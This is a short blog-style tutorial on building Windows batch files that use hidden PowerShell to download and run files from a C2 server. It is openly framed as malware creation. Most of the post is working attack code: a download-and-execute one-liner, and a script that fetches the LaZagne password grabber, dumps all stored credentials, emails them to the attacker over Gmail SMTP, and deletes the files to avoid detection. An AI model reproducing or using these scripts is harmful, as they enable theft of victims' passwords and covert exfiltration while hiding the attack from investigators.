Powershell – Download and execute (payload, password grabber, keylogger, etc.)

In this post I will describe you how you can create executable batch file (.bat), which will download and execute any file over powershell you will define. I usually use this technique to create malware, which includes multiple attacks at once. For example, you can create file which will download and execute payload. At the same time it will download and execute keylogger, password grabber, etc. There is limit less options. The only limit is your imagination.

Here is the example of batch file, which will download malicious file from the path you define. Usually I put those files on C2 server. After the download the file would be saved on the defined path and executed. In this case I download it to the temp folder.

powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://PATH_TO_FILE/example.bat’,’%TEMP%\example.bat’); Start-Process “%TEMP%\example.bat”

If you want to download and execute more files at once, you just add the same text from above in the new line in the same batch file, and of course you need to change the file name.

In the further text I will explain you how you can download file, execute it, create mail client, grab passwords, create file and send it on the email and after that delete all traces. For this purpose I will show you on case of password grabber. Usually I create separated grabber batch file and use it in above example.

@echo off

set downloadURL=http://PATH TO/laZagne_x64.exe

set email= EMAIL ADDRESS

set password= PASSWORD

set exeFile=%TEMP%\proc.exe

set logFile=%TEMP%\proclog.txt

set arguments=all

powershell (new-object System.Net.WebClient).DownloadFile(‘%downloadURL%’,’%exeFile%’);

%exeFile% %arguments% > %logFile%

del %exeFile%

powershell $SMTPServer = ‘smtp.gmail.com’;$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);$SMTPInfo.EnableSsl = $true;$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(‘%email%’, ‘%password%’);$ReportEmail = New-Object System.Net.Mail.MailMessage;$ReportEmail.From = ‘%email%’;$ReportEmail.To.Add(‘%email%’);$ReportEmail.Subject = ‘Lazagne Report’;$ReportEmail.Body = ‘Lazagne report in the attachments.’;$ReportEmail.Attachments.Add(‘%logFile%’);$SMTPInfo.Send($ReportEmail);

del %logFile%

Explanation: First we set some variables as download url, email address and password, name and location of executable and log file. In the further of script powershell download and execute the password grabber and save output into the log file. Then the executable file is deleted to hide traces. After that the email client is set, which send the log file with all grabbed passwords from the browser on your email. And for the end also the log file is deleted.

Note: to use gmail address you need to enable that less secure apps access your account.

So, we also learned how to delete all files you downloaded and created. This is smart move which should every attacker use, because after attack it would not be possible to detect and trace the attack.


Add a Comment